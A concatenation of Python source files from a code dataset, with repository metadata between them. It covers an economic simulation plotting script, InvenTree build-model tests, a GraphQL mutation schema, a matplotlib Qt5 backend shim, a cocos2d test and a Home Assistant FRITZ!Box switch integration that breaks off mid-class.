subdata = data[data['time']==T][['GDP gap', 'inflation', 'interest']]
stats =pd.DataFrame({'Deterministic Steady-State': [*sstar.flatten(), xstar],
                     'Ergodic Means': subdata.mean(),
                     'Ergodic Standard Deviations': subdata.std()})
# In a notebook cell this bare expression displays the transposed table; as a
# plain script it is a no-op.
stats.T
# ### Simulated State and Policy Paths
# In[19]:
# Keep only three sample replications for the spaghetti lines in the plots.
subdata = data[data['_rep'].isin(range(3))]
opts = dict(spec='r*', offset=(0, -15), fs=11, ha='right')
gdpstar, infstar, intstar = stats['Ergodic Means']
def simplot(series,ylabel,yticks,steady):
    """Plot simulated paths of *series* together with its cross-replication mean.

    Reads the module-level ``data`` (all replications), ``subdata`` (three
    sample replications), ``T`` (horizon) and ``opts`` (annotation style).
    Returns the created figure.
    """
    fig = demo.figure('Simulated and Expected ' + ylabel,'Period', ylabel,[0, T + 0.5])
    # Mean across replications at each period.
    plt.plot(data[['time',series]].groupby('time').mean())
    # Three individual sample paths, drawn with thin lines.
    plt.plot(subdata.pivot('time','_rep',series),lw=1)
    plt.xticks(np.arange(0,24,4))
    plt.yticks(yticks)
    # Mark the expected long-run value at the final simulated period.
    demo.annotate(T, steady, f'Expected {series}\n = {steady:.2f}', **opts)
    return fig
# In[20]:
# Each call draws simulated sample paths plus the cross-sectional mean.
fig4 = simplot('GDP gap','GDP gap',np.arange(smin[0],smax[0]+1),gdpstar)
# In[21]:
fig5 = simplot('inflation', 'Inflation Rate',np.arange(smin[1],smax[1]+1),infstar)
# In[22]:
fig6 = simplot('interest','Nominal Interest Rate',np.arange(-2,5),intstar)
# In[23]:
#demo.savefig([fig1,fig2,fig3,fig4,fig5,fig6])
| 28.969512 | 345 | 0.651021 |
b572feb14b8f529842f9f322cf4f0a5b5e29ea7b | 10,928 | py | Python | InvenTree/build/test_build.py | Guusggg/InvenTree | fa163b88665b69de93fafd822faf1c1953cf4d87 | [
"MIT"
] | null | null | null | InvenTree/build/test_build.py | Guusggg/InvenTree | fa163b88665b69de93fafd822faf1c1953cf4d87 | [
"MIT"
] | null | null | null | InvenTree/build/test_build.py | Guusggg/InvenTree | fa163b88665b69de93fafd822faf1c1953cf4d87 | [
"MIT"
] | 1 | 2021-06-22T15:07:39.000Z | 2021-06-22T15:07:39.000Z | # -*- coding: utf-8 -*-
from django.test import TestCase
from django.core.exceptions import ValidationError
from django.db.utils import IntegrityError
from InvenTree import status_codes as status
from build.models import Build, BuildItem, get_next_build_number
from stock.models import StockItem
from part.models import Part, BomItem
class BuildTest(TestCase):
    """
    Run some tests to ensure that the Build model is working properly.
    """
    def setUp(self):
        """
        Initialize data to use for these tests.
        The base Part 'assembly' has a BOM consisting of three parts:
        - 5 x sub_part_1
        - 3 x sub_part_2
        - 2 x sub_part_3 (trackable)
        We will build 10x 'assembly' parts, in two build outputs:
        - 3 x output_1
        - 7 x output_2
        """
        # Create a base "Part"
        self.assembly = Part.objects.create(
            name="An assembled part",
            description="Why does it matter what my description is?",
            assembly=True,
            trackable=True,
        )
        self.sub_part_1 = Part.objects.create(
            name="Widget A",
            description="A widget",
            component=True
        )
        self.sub_part_2 = Part.objects.create(
            name="Widget B",
            description="A widget",
            component=True
        )
        self.sub_part_3 = Part.objects.create(
            name="Widget C",
            description="A widget",
            component=True,
            trackable=True
        )
        # Create BOM item links for the parts
        BomItem.objects.create(
            part=self.assembly,
            sub_part=self.sub_part_1,
            quantity=5
        )
        BomItem.objects.create(
            part=self.assembly,
            sub_part=self.sub_part_2,
            quantity=3
        )
        # sub_part_3 is trackable!
        BomItem.objects.create(
            part=self.assembly,
            sub_part=self.sub_part_3,
            quantity=2
        )
        ref = get_next_build_number()
        if ref is None:
            ref = "0001"
        # Create a "Build" object to make 10x objects
        self.build = Build.objects.create(
            reference=ref,
            title="This is a build",
            part=self.assembly,
            quantity=10
        )
        # Create some build output (StockItem) objects
        self.output_1 = StockItem.objects.create(
            part=self.assembly,
            quantity=3,
            is_building=True,
            build=self.build
        )
        self.output_2 = StockItem.objects.create(
            part=self.assembly,
            quantity=7,
            is_building=True,
            build=self.build,
        )
        # Create some stock items to assign to the build
        self.stock_1_1 = StockItem.objects.create(part=self.sub_part_1, quantity=1000)
        self.stock_1_2 = StockItem.objects.create(part=self.sub_part_1, quantity=100)
        self.stock_2_1 = StockItem.objects.create(part=self.sub_part_2, quantity=5000)
        self.stock_3_1 = StockItem.objects.create(part=self.sub_part_3, quantity=1000)
    def test_init(self):
        # Perform some basic tests before we start the ball rolling
        self.assertEqual(StockItem.objects.count(), 6)
        # Build is PENDING
        self.assertEqual(self.build.status, status.BuildStatus.PENDING)
        # Build has two build outputs
        self.assertEqual(self.build.output_count, 2)
        # None of the build outputs have been completed
        for output in self.build.get_build_outputs().all():
            self.assertFalse(self.build.isFullyAllocated(output))
        self.assertFalse(self.build.isPartFullyAllocated(self.sub_part_1, self.output_1))
        self.assertFalse(self.build.isPartFullyAllocated(self.sub_part_2, self.output_2))
        # Required quantities: 5/unit x 3 units = 15, 5 x 7 = 35,
        # 3 x 3 = 9 and 3 x 7 = 21 respectively.
        self.assertEqual(self.build.unallocatedQuantity(self.sub_part_1, self.output_1), 15)
        self.assertEqual(self.build.unallocatedQuantity(self.sub_part_1, self.output_2), 35)
        self.assertEqual(self.build.unallocatedQuantity(self.sub_part_2, self.output_1), 9)
        self.assertEqual(self.build.unallocatedQuantity(self.sub_part_2, self.output_2), 21)
        self.assertFalse(self.build.is_complete)
    def test_build_item_clean(self):
        # Ensure that dodgy BuildItem objects cannot be created
        stock = StockItem.objects.create(part=self.assembly, quantity=99)
        # Create a BuildItem which points to an invalid StockItem
        b = BuildItem(stock_item=stock, build=self.build, quantity=10)
        with self.assertRaises(ValidationError):
            b.save()
        # Create a BuildItem which has too much stock assigned
        b = BuildItem(stock_item=self.stock_1_1, build=self.build, quantity=9999999)
        with self.assertRaises(ValidationError):
            b.clean()
        # Negative stock? Not on my watch!
        b = BuildItem(stock_item=self.stock_1_1, build=self.build, quantity=-99)
        with self.assertRaises(ValidationError):
            b.clean()
        # Ok, what about we make one that does *not* fail?
        b = BuildItem(stock_item=self.stock_1_1, build=self.build, install_into=self.output_1, quantity=10)
        b.save()
    def test_duplicate_bom_line(self):
        # Try to add a duplicate BOM item - it should fail!
        with self.assertRaises(IntegrityError):
            BomItem.objects.create(
                part=self.assembly,
                sub_part=self.sub_part_1,
                quantity=99
            )
    def allocate_stock(self, output, allocations):
        """
        Allocate stock to this build, against a particular output
        Args:
            output - StockItem object (or None)
            allocations - Map of {StockItem: quantity}
        """
        for item, quantity in allocations.items():
            BuildItem.objects.create(
                build=self.build,
                stock_item=item,
                quantity=quantity,
                install_into=output
            )
    def test_partial_allocation(self):
        """
        Test partial allocation of stock
        """
        # Fully allocate tracked stock against build output 1
        self.allocate_stock(
            self.output_1,
            {
                self.stock_3_1: 6,
            }
        )
        self.assertTrue(self.build.isFullyAllocated(self.output_1))
        # Partially allocate tracked stock against build output 2
        self.allocate_stock(
            self.output_2,
            {
                self.stock_3_1: 1,
            }
        )
        self.assertFalse(self.build.isFullyAllocated(self.output_2))
        # Partially allocate untracked stock against build
        self.allocate_stock(
            None,
            {
                self.stock_1_1: 1,
                self.stock_2_1: 1
            }
        )
        self.assertFalse(self.build.isFullyAllocated(None, verbose=True))
        unallocated = self.build.unallocatedParts(None)
        self.assertEqual(len(unallocated), 2)
        self.allocate_stock(
            None,
            {
                self.stock_1_2: 100,
            }
        )
        # sub_part_1 is now fully covered; only sub_part_2 remains short.
        self.assertFalse(self.build.isFullyAllocated(None, verbose=True))
        unallocated = self.build.unallocatedParts(None)
        self.assertEqual(len(unallocated), 1)
        # Removing the untracked allocations should leave both parts short again.
        self.build.unallocateUntracked()
        unallocated = self.build.unallocatedParts(None)
        self.assertEqual(len(unallocated), 2)
        self.assertFalse(self.build.areUntrackedPartsFullyAllocated())
        # Now we "fully" allocate the remaining untracked items
        self.allocate_stock(
            None,
            {
                self.stock_1_1: 50,
                self.stock_2_1: 50,
            }
        )
        self.assertTrue(self.build.areUntrackedPartsFullyAllocated())
    def test_auto_allocate(self):
        """
        Test auto-allocation functionality against the build outputs.
        Note: auto-allocations only work for un-tracked stock!
        """
        allocations = self.build.getAutoAllocations()
        self.assertEqual(len(allocations), 1)
        self.build.autoAllocate()
        self.assertEqual(BuildItem.objects.count(), 1)
        # Check that one un-tracked part has been fully allocated to the build
        self.assertTrue(self.build.isPartFullyAllocated(self.sub_part_2, None))
        self.assertFalse(self.build.isPartFullyAllocated(self.sub_part_1, None))
    def test_cancel(self):
        """
        Test cancellation of the build
        """
        # TODO
        """
        self.allocate_stock(50, 50, 200, self.output_1)
        self.build.cancelBuild(None)
        self.assertEqual(BuildItem.objects.count(), 0)
        """
        pass
    def test_complete(self):
        """
        Test completion of a build output
        """
        # Allocate non-tracked parts
        self.allocate_stock(
            None,
            {
                self.stock_1_1: self.stock_1_1.quantity, # Allocate *all* stock from this item
                self.stock_1_2: 10,
                self.stock_2_1: 30
            }
        )
        # Allocate tracked parts to output_1
        self.allocate_stock(
            self.output_1,
            {
                self.stock_3_1: 6
            }
        )
        # Allocate tracked parts to output_2
        self.allocate_stock(
            self.output_2,
            {
                self.stock_3_1: 14
            }
        )
        self.assertTrue(self.build.isFullyAllocated(None, verbose=True))
        self.assertTrue(self.build.isFullyAllocated(self.output_1))
        self.assertTrue(self.build.isFullyAllocated(self.output_2))
        # Completing only the first output leaves the build unfinished.
        self.build.completeBuildOutput(self.output_1, None)
        self.assertFalse(self.build.can_complete)
        self.build.completeBuildOutput(self.output_2, None)
        self.assertTrue(self.build.can_complete)
        self.build.complete_build(None)
        self.assertEqual(self.build.status, status.BuildStatus.COMPLETE)
        # the original BuildItem objects should have been deleted!
        self.assertEqual(BuildItem.objects.count(), 0)
        # New stock items should have been created!
        self.assertEqual(StockItem.objects.count(), 7)
        # This stock item has been depleted!
        with self.assertRaises(StockItem.DoesNotExist):
            StockItem.objects.get(pk=self.stock_1_1.pk)
        # This stock item has *not* been depleted (5000 - 30 = 4970)
        x = StockItem.objects.get(pk=self.stock_2_1.pk)
        self.assertEqual(x.quantity, 4970)
        # And 10 new stock items created for the build output
        outputs = StockItem.objects.filter(build=self.build)
        self.assertEqual(outputs.count(), 2)
        for output in outputs:
            self.assertFalse(output.is_building)
| 29.219251 | 107 | 0.60313 |
d96c230351c968101397b97c67c293d8c8150ccb | 856 | py | Python | back-end/sistema_ng/pruebas/mutations.py | BonifacioJZ/sistema-ng | a0d9c5125528a75d723cded454546a815a18f0a7 | [
"MIT"
] | null | null | null | back-end/sistema_ng/pruebas/mutations.py | BonifacioJZ/sistema-ng | a0d9c5125528a75d723cded454546a815a18f0a7 | [
"MIT"
] | 9 | 2021-03-19T02:05:56.000Z | 2022-02-26T18:15:35.000Z | back-end/sistema_ng/pruebas/mutations.py | BonifacioJZ/sistema-ng | a0d9c5125528a75d723cded454546a815a18f0a7 | [
"MIT"
] | null | null | null | import graphene
from .queryM import (CreateUser,Login,CreatePaciente,CreateMedicine,
CreateExpediente,UpdatePaciennte,CreateNote,UpdateExpedient,
UpdateNoteExpedient,DeleteNoteExpedient, DeleteExpedient,
UpdateMedicine,DeleteMedicine)
class Mutation(graphene.ObjectType):
    """Root GraphQL mutation type aggregating every mutation field of the API."""
    # NOTE(review): the field is named create_actor but bound to CreateUser —
    # confirm the mismatch is intentional; the field name is part of the schema.
    create_actor = CreateUser.Field()
    login = Login.Field()
    # Patient and medicine management
    create_paciente = CreatePaciente.Field()
    create_medicine = CreateMedicine.Field()
    # Expedient (medical record) management
    create_expediente = CreateExpediente.Field()
    update_expediente = UpdateExpedient.Field()
    update_paciente = UpdatePaciennte.Field()
    create_note = CreateNote.Field()
    update_note_expedient = UpdateNoteExpedient.Field()
    delete_note_expedient = DeleteNoteExpedient.Field()
    delete_expedient = DeleteExpedient.Field()
    update_medicine = UpdateMedicine.Field()
delete_medicine = DeleteMedicine.Field() | 42.8 | 68 | 0.795561 |
91564448c453f9b678f6e6835d012014db8d68a3 | 557 | py | Python | venv/Lib/site-packages/matplotlib/backends/backend_qt5.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | [
"MIT"
] | null | null | null | venv/Lib/site-packages/matplotlib/backends/backend_qt5.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | [
"MIT"
] | null | null | null | venv/Lib/site-packages/matplotlib/backends/backend_qt5.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | [
"MIT"
] | null | null | null | from .backend_qt import (
backend_version, SPECIAL_KEYS,
# Public API
cursord, _create_qApp, _BackendQT, TimerQT, MainWindow, FigureCanvasQT,
FigureManagerQT, ToolbarQt, NavigationToolbar2QT, SubplotToolQt,
SaveFigureQt, ConfigureSubplotsQt, SetCursorQt, RubberbandQt,
HelpQt, ToolCopyToClipboardQT,
# internal re-exports
FigureCanvasBase, FigureManagerBase, MouseButton, NavigationToolbar2,
TimerBase, ToolContainerBase, figureoptions, Gcf
)
# _BackendQT.export presumably registers this class as the module's backend
# entry point — confirm against matplotlib's _Backend.export.
@_BackendQT.export
class _BackendQT5(_BackendQT):
    """Qt5 backend; all behavior is inherited unchanged from _BackendQT."""
    pass
| 32.764706 | 76 | 0.755835 |
a0d8c2fbd36cb5161bc09f53556ff7f65b2a9bd0 | 897 | py | Python | team_9/cocos/test/test_scaleby.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | 1 | 2019-09-15T18:59:49.000Z | 2019-09-15T18:59:49.000Z | team_9/cocos/test/test_scaleby.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | team_9/cocos/test/test_scaleby.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division, print_function, unicode_literals
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
# Metadata read by cocos's test harness; presumably "t <sec>, s" means take a
# snapshot at that time and "q" quits — confirm against the harness docs.
testinfo = "t 0.1, s, t 1, s, t 2.1, s, q"
tags = "ScaleBy"
import cocos
from cocos.director import director
from cocos.actions import ScaleBy
from cocos.sprite import Sprite
import pyglet
class TestLayer(cocos.layer.Layer):
    """Layer showing a single grossini sprite running a ScaleBy action."""

    def __init__(self):
        super(TestLayer, self).__init__()
        width, height = director.get_window_size()
        center = (width // 2, height // 2)
        self.sprite = Sprite('grossini.png', center, scale=0.1)
        self.add(self.sprite)
        self.sprite.do(ScaleBy(10, 2))
def main():
    """Initialise the director and run a scene containing the test layer."""
    director.init()
    scene = cocos.scene.Scene(TestLayer())
    director.run(scene)
# Run the demo only when executed directly, not when imported.
if __name__ == '__main__':
    main()
| 24.916667 | 73 | 0.6767 |
cac6e735a8191af32c2170ea10c44a646aba975e | 19,728 | py | Python | homeassistant/components/fritz/switch.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 3 | 2021-11-22T22:37:43.000Z | 2022-03-17T00:55:28.000Z | homeassistant/components/fritz/switch.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 1,016 | 2019-06-18T21:27:47.000Z | 2020-03-06T11:09:58.000Z | homeassistant/components/fritz/switch.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 3 | 2022-01-02T18:49:54.000Z | 2022-01-25T02:03:54.000Z | """Switches for AVM Fritz!Box functions."""
from __future__ import annotations
import logging
from typing import Any
import xmltodict
from homeassistant.components.network import async_get_source_ip
from homeassistant.components.switch import SwitchEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.device_registry import CONNECTION_NETWORK_MAC
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo, Entity, EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util import slugify
from .common import (
AvmWrapper,
FritzBoxBaseEntity,
FritzData,
FritzDevice,
FritzDeviceBase,
SwitchInfo,
device_filter_out_from_trackers,
)
from .const import (
DATA_FRITZ,
DOMAIN,
SWITCH_TYPE_DEFLECTION,
SWITCH_TYPE_PORTFORWARD,
SWITCH_TYPE_PROFILE,
SWITCH_TYPE_WIFINETWORK,
WIFI_STANDARD,
MeshRoles,
)
_LOGGER = logging.getLogger(__name__)
def deflection_entities_list(
    avm_wrapper: AvmWrapper, device_friendly_name: str
) -> list[FritzBoxDeflectionSwitch]:
    """Build one switch entity per call deflection configured on the box."""
    _LOGGER.debug("Setting up %s switches", SWITCH_TYPE_DEFLECTION)
    num_response = avm_wrapper.get_ontel_num_deflections()
    if not num_response:
        _LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_DEFLECTION)
        return []
    _LOGGER.debug(
        "Specific %s response: GetNumberOfDeflections=%s",
        SWITCH_TYPE_DEFLECTION,
        num_response,
    )
    if num_response["NewNumberOfDeflections"] == 0:
        _LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_DEFLECTION)
        return []
    raw_deflections = avm_wrapper.get_ontel_deflections()
    if not raw_deflections:
        return []
    # The deflection list arrives as XML; a single entry parses to a plain
    # dict rather than a one-element list, so normalize before iterating.
    parsed = xmltodict.parse(raw_deflections["NewDeflectionList"])["List"]["Item"]
    if not isinstance(parsed, list):
        parsed = [parsed]
    entities: list[FritzBoxDeflectionSwitch] = []
    for deflection in parsed:
        entities.append(
            FritzBoxDeflectionSwitch(avm_wrapper, device_friendly_name, deflection)
        )
    return entities
def port_entities_list(
    avm_wrapper: AvmWrapper, device_friendly_name: str, local_ip: str
) -> list[FritzBoxPortSwitch]:
    """Get list of port forwarding entities.

    One switch is created per port forwarding whose internal client is
    local_ip, i.e. only forwards pointing at this Home Assistant host.
    """
    _LOGGER.debug("Setting up %s switches", SWITCH_TYPE_PORTFORWARD)
    entities_list: list[FritzBoxPortSwitch] = []
    if not avm_wrapper.device_conn_type:
        _LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_PORTFORWARD)
        return []
    # Query port forwardings and setup a switch for each forward for the current device
    resp = avm_wrapper.get_num_port_mapping(avm_wrapper.device_conn_type)
    if not resp:
        # Was logging SWITCH_TYPE_DEFLECTION here (copy/paste slip) — this
        # function deals with port forwards, so log the right switch type.
        _LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_PORTFORWARD)
        return []
    port_forwards_count: int = resp["NewPortMappingNumberOfEntries"]
    _LOGGER.debug(
        "Specific %s response: GetPortMappingNumberOfEntries=%s",
        SWITCH_TYPE_PORTFORWARD,
        port_forwards_count,
    )
    _LOGGER.debug("IP source for %s is %s", avm_wrapper.host, local_ip)
    for i in range(port_forwards_count):
        portmap = avm_wrapper.get_port_mapping(avm_wrapper.device_conn_type, i)
        if not portmap:
            # Same copy/paste slip fixed here: report PORTFORWARD, not DEFLECTION.
            _LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_PORTFORWARD)
            continue
        _LOGGER.debug(
            "Specific %s response: GetGenericPortMappingEntry=%s",
            SWITCH_TYPE_PORTFORWARD,
            portmap,
        )
        # We can only handle port forwards of the given device
        if portmap["NewInternalClient"] == local_ip:
            port_name = portmap["NewPortMappingDescription"]
            # Disambiguate duplicate descriptions by appending the external port.
            for entity in entities_list:
                if entity.port_mapping and (
                    port_name in entity.port_mapping["NewPortMappingDescription"]
                ):
                    port_name = f"{port_name} {portmap['NewExternalPort']}"
            entities_list.append(
                FritzBoxPortSwitch(
                    avm_wrapper,
                    device_friendly_name,
                    portmap,
                    port_name,
                    i,
                    avm_wrapper.device_conn_type,
                )
            )
    return entities_list
def wifi_entities_list(
    avm_wrapper: AvmWrapper, device_friendly_name: str
) -> list[FritzBoxWifiSwitch]:
    """Get list of wifi entities, one per externally visible WLAN network."""
    _LOGGER.debug("Setting up %s switches", SWITCH_TYPE_WIFINETWORK)
    #
    # https://avm.de/fileadmin/user_upload/Global/Service/Schnittstellen/wlanconfigSCPD.pdf
    #
    # Count how many WLANConfiguration TR-064 services the box exposes.
    wifi_count = len(
        [
            s
            for s in avm_wrapper.connection.services
            if s.startswith("WLANConfiguration")
        ]
    )
    _LOGGER.debug("WiFi networks count: %s", wifi_count)
    networks: dict = {}
    for i in range(1, wifi_count + 1):
        network_info = avm_wrapper.connection.call_action(
            f"WLANConfiguration{i}", "GetInfo"
        )
        # Devices with 4 WLAN services, use the 2nd for internal communications
        if not (wifi_count == 4 and i == 2):
            networks[i] = {
                "ssid": network_info["NewSSID"],
                "bssid": network_info["NewBSSID"],
                "standard": network_info["NewStandard"],
                "enabled": network_info["NewEnable"],
                "status": network_info["NewStatus"],
            }
    # When two networks share an SSID, disambiguate the switch name with the
    # WIFI_STANDARD label for that service index. Iterate over a copy because
    # the loop body writes a new "switch_name" key into each entry.
    for i, network in networks.copy().items():
        networks[i]["switch_name"] = network["ssid"]
        if len([j for j, n in networks.items() if n["ssid"] == network["ssid"]]) > 1:
            networks[i]["switch_name"] += f" ({WIFI_STANDARD[i]})"
    _LOGGER.debug("WiFi networks list: %s", networks)
    return [
        FritzBoxWifiSwitch(
            avm_wrapper, device_friendly_name, index, data["switch_name"]
        )
        for index, data in networks.items()
    ]
def profile_entities_list(
    avm_wrapper: AvmWrapper,
    data_fritz: FritzData,
) -> list[FritzBoxProfileSwitch]:
    """Create profile switches for tracked devices not yet handled elsewhere."""
    _LOGGER.debug("Setting up %s switches", SWITCH_TYPE_PROFILE)
    switches: list[FritzBoxProfileSwitch] = []
    if "X_AVM-DE_HostFilter1" not in avm_wrapper.connection.services:
        return switches
    # Make sure this box has its own bookkeeping set of already-created switches.
    tracked = data_fritz.profile_switches.setdefault(avm_wrapper.unique_id, set())
    for mac, device in avm_wrapper.devices.items():
        if device_filter_out_from_trackers(
            mac, device, data_fritz.profile_switches.values()
        ):
            _LOGGER.debug(
                "Skipping profile switch creation for device %s", device.hostname
            )
        else:
            switches.append(FritzBoxProfileSwitch(avm_wrapper, device))
            tracked.add(mac)
    _LOGGER.debug("Creating %s profile switches", len(switches))
    return switches
def all_entities_list(
    avm_wrapper: AvmWrapper,
    device_friendly_name: str,
    data_fritz: FritzData,
    local_ip: str,
) -> list[Entity]:
    """Collect every switch entity for this device; mesh slaves get none."""
    if avm_wrapper.mesh_role == MeshRoles.SLAVE:
        return []
    entities: list[Entity] = []
    entities.extend(deflection_entities_list(avm_wrapper, device_friendly_name))
    entities.extend(port_entities_list(avm_wrapper, device_friendly_name, local_ip))
    entities.extend(wifi_entities_list(avm_wrapper, device_friendly_name))
    entities.extend(profile_entities_list(avm_wrapper, data_fritz))
    return entities
async def async_setup_entry(
    hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
    """Set up all FRITZ!Box switch entities for a config entry."""
    _LOGGER.debug("Setting up switches")
    avm_wrapper: AvmWrapper = hass.data[DOMAIN][entry.entry_id]
    data_fritz: FritzData = hass.data[DATA_FRITZ]
    _LOGGER.debug("Fritzbox services: %s", avm_wrapper.connection.services)
    # IP this host uses to reach the box; port forward switches are only
    # created for forwards pointing at this address.
    local_ip = await async_get_source_ip(avm_wrapper.hass, target_ip=avm_wrapper.host)
    # Entity discovery makes blocking device calls, so run it in the executor.
    entities_list = await hass.async_add_executor_job(
        all_entities_list,
        avm_wrapper,
        entry.title,
        data_fritz,
        local_ip,
    )
    async_add_entities(entities_list)
    @callback
    def update_avm_device() -> None:
        """Create profile switches for devices discovered after setup."""
        async_add_entities(profile_entities_list(avm_wrapper, data_fritz))
    # Listen for newly discovered devices; the listener is detached again
    # when the config entry unloads.
    entry.async_on_unload(
        async_dispatcher_connect(hass, avm_wrapper.signal_device_new, update_avm_device)
    )
class FritzBoxBaseSwitch(FritzBoxBaseEntity):
    """Fritz switch base class.

    Subclasses supply a SwitchInfo whose callback_update/callback_switch
    coroutines implement the device-specific refresh and on/off logic.
    """
    _attr_is_on: bool | None = False
    def __init__(
        self,
        avm_wrapper: AvmWrapper,
        device_friendly_name: str,
        switch_info: SwitchInfo,
    ) -> None:
        """Initialize the Fritz base switch from the given SwitchInfo."""
        super().__init__(avm_wrapper, device_friendly_name)
        self._description = switch_info["description"]
        self._friendly_name = switch_info["friendly_name"]
        self._icon = switch_info["icon"]
        self._type = switch_info["type"]
        # Coroutines provided by the subclass: refresh state / set on-off.
        self._update = switch_info["callback_update"]
        self._switch = switch_info["callback_switch"]
        self._name = f"{self._friendly_name} {self._description}"
        self._unique_id = f"{self._avm_wrapper.unique_id}-{slugify(self._description)}"
        self._attributes: dict[str, str] = {}
        self._is_available = True
    @property
    def name(self) -> str:
        """Return name."""
        return self._name
    @property
    def icon(self) -> str:
        """Return icon."""
        return self._icon
    @property
    def unique_id(self) -> str:
        """Return unique id."""
        return self._unique_id
    @property
    def available(self) -> bool:
        """Return availability."""
        return self._is_available
    @property
    def extra_state_attributes(self) -> dict[str, str]:
        """Return device attributes."""
        return self._attributes
    async def async_update(self) -> None:
        """Update data via the subclass-provided update callback."""
        _LOGGER.debug("Updating '%s' (%s) switch state", self.name, self._type)
        await self._update()
    async def async_turn_on(self, **kwargs: Any) -> None:
        """Turn on switch."""
        await self._async_handle_turn_on_off(turn_on=True)
    async def async_turn_off(self, **kwargs: Any) -> None:
        """Turn off switch."""
        await self._async_handle_turn_on_off(turn_on=False)
    async def _async_handle_turn_on_off(self, turn_on: bool) -> None:
        """Delegate the state change to the subclass callback, then mirror it."""
        await self._switch(turn_on)
        # Optimistically reflect the requested state until the next update.
        self._attr_is_on = turn_on
class FritzBoxPortSwitch(FritzBoxBaseSwitch, SwitchEntity):
    """Defines a FRITZ!Box Tools PortForward switch."""
    def __init__(
        self,
        avm_wrapper: AvmWrapper,
        device_friendly_name: str,
        port_mapping: dict[str, Any] | None,
        port_name: str,
        idx: int,
        connection_type: str,
    ) -> None:
        """Init Fritzbox port switch."""
        self._avm_wrapper = avm_wrapper
        self._attributes = {}
        self.connection_type = connection_type
        self.port_mapping = port_mapping  # dict in the format as it comes from fritzconnection. eg: {'NewRemoteHost': '0.0.0.0', 'NewExternalPort': 22, 'NewProtocol': 'TCP', 'NewInternalPort': 22, 'NewInternalClient': '192.168.178.31', 'NewEnabled': True, 'NewPortMappingDescription': 'Beast SSH ', 'NewLeaseDuration': 0}
        self._idx = idx  # needed for update routine
        self._attr_entity_category = EntityCategory.CONFIG
        # Without a mapping there is nothing to control; skip base-class setup,
        # leaving the entity effectively uninitialized.
        if port_mapping is None:
            return
        switch_info = SwitchInfo(
            description=f"Port forward {port_name}",
            friendly_name=device_friendly_name,
            icon="mdi:check-network",
            type=SWITCH_TYPE_PORTFORWARD,
            callback_update=self._async_fetch_update,
            callback_switch=self._async_switch_on_off_executor,
        )
        super().__init__(avm_wrapper, device_friendly_name, switch_info)
    async def _async_fetch_update(self) -> None:
        """Re-read this port mapping from the box and refresh state/attributes."""
        self.port_mapping = await self._avm_wrapper.async_get_port_mapping(
            self.connection_type, self._idx
        )
        _LOGGER.debug(
            "Specific %s response: %s", SWITCH_TYPE_PORTFORWARD, self.port_mapping
        )
        if not self.port_mapping:
            self._is_available = False
            return
        self._attr_is_on = self.port_mapping["NewEnabled"] is True
        self._is_available = True
        # Map TR-064 field names onto the friendlier attribute names exposed
        # to Home Assistant.
        attributes_dict = {
            "NewInternalClient": "internal_ip",
            "NewInternalPort": "internal_port",
            "NewExternalPort": "external_port",
            "NewProtocol": "protocol",
            "NewPortMappingDescription": "description",
        }
        for key, attr in attributes_dict.items():
            self._attributes[attr] = self.port_mapping[key]
    async def _async_switch_on_off_executor(self, turn_on: bool) -> bool:
        """Re-submit the stored mapping with NewEnabled toggled; False if no mapping."""
        if self.port_mapping is None:
            return False
        self.port_mapping["NewEnabled"] = "1" if turn_on else "0"
        resp = await self._avm_wrapper.async_add_port_mapping(
            self.connection_type, self.port_mapping
        )
        return bool(resp is not None)
class FritzBoxDeflectionSwitch(FritzBoxBaseSwitch, SwitchEntity):
    """Defines a FRITZ!Box Tools call deflection switch."""
    def __init__(
        self,
        avm_wrapper: AvmWrapper,
        device_friendly_name: str,
        dict_of_deflection: Any,
    ) -> None:
        """Init Fritzbox Deflection class."""
        self._avm_wrapper = avm_wrapper
        self.dict_of_deflection = dict_of_deflection
        self._attributes = {}
        self.id = int(self.dict_of_deflection["DeflectionId"])
        self._attr_entity_category = EntityCategory.CONFIG
        switch_info = SwitchInfo(
            description=f"Call deflection {self.id}",
            friendly_name=device_friendly_name,
            icon="mdi:phone-forward",
            type=SWITCH_TYPE_DEFLECTION,
            callback_update=self._async_fetch_update,
            callback_switch=self._async_switch_on_off_executor,
        )
        super().__init__(self._avm_wrapper, device_friendly_name, switch_info)
    async def _async_fetch_update(self) -> None:
        """Re-read the deflection list and refresh this entry's state."""
        resp = await self._avm_wrapper.async_get_ontel_deflections()
        if not resp:
            self._is_available = False
            return
        # XML parse yields a dict for a single entry, a list for several;
        # pick this entity's entry by its deflection id in the list case.
        self.dict_of_deflection = xmltodict.parse(resp["NewDeflectionList"])["List"][
            "Item"
        ]
        if isinstance(self.dict_of_deflection, list):
            self.dict_of_deflection = self.dict_of_deflection[self.id]
        _LOGGER.debug(
            "Specific %s response: NewDeflectionList=%s",
            SWITCH_TYPE_DEFLECTION,
            self.dict_of_deflection,
        )
        self._attr_is_on = self.dict_of_deflection["Enable"] == "1"
        self._is_available = True
        self._attributes["type"] = self.dict_of_deflection["Type"]
